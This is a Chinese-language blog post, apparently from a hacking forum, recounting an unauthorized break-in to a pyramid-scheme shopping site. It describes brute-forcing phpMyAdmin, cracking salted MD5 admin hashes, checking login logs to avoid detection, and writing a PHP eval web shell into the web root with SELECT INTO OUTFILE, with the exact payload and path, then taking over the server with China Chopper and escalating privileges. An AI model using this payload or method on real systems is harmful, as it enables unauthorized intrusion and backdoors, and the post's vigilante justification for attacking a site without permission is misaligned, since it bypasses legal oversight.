针对某传销购物网的一次渗透测试

事件从无意爆破出一个phpmyadmin账号开始

打开了数据库看了一眼感觉是个非法网站
打开ip一看，果然是，
附上首页截图


 
既然是非法网站就要搞一搞了

然后从开始翻翻数据库

找到了管理员用户名密码


 
然后尝试各种md5解密，

成功在几个网站试过之后得到了明文，附图

几个md5解密网站尝试之后

把这几个管理员的md5密文分别在不同解密网站尝试之后得到了admin账号的明文，


 
竟然是TPSHOPadmin888

接下来就是查找有没有管理员登陆日志，防止自己登陆之后被发现，

然后翻数据库，发现了这个，就是在这里记录的登陆日志了


 
然后按照这个去后台登陆，
然而，无论怎么试，都是登陆错误，这就很郁闷了。。。


 :
最后想到，先注册一个普通账号，再解密一下普通账号的密码，看看是不是有哪里不对，

然后主页点登陆，登陆页面点注册，随意注册了一个账号，密码adminadmin，然后到数据库里找到对应账号的密文，拿去解密


 


 


 
发现，，密码前边多了TPSHOP，

原来后台密码就是admin888，【老鸟一般看MD5就知道是admin888了 

原谅我是一个小小鸟i】

赶紧尝试一波。


 

成功登陆


 
最后找到了网站的绝对路径 php 写入一句话

用到的一句话：select '<?php @eval($_POST[q])?>'INTO OUTFILE 'D:/phpStudy/WWW/meker.php'


 
写入成功后 那还说啥了 ？  上菜刀  







 


 

拿下服务器 提权成功  

排版不好 新手瞎搞 老鸟请飞过。。。

你会喜欢
挖掘利器Andro Tickler：安卓应用渗透测试和审核工具箱
渗透测试一条龙，针对指定站点思路
全能无线渗透测试工具，一个LAZY就搞定了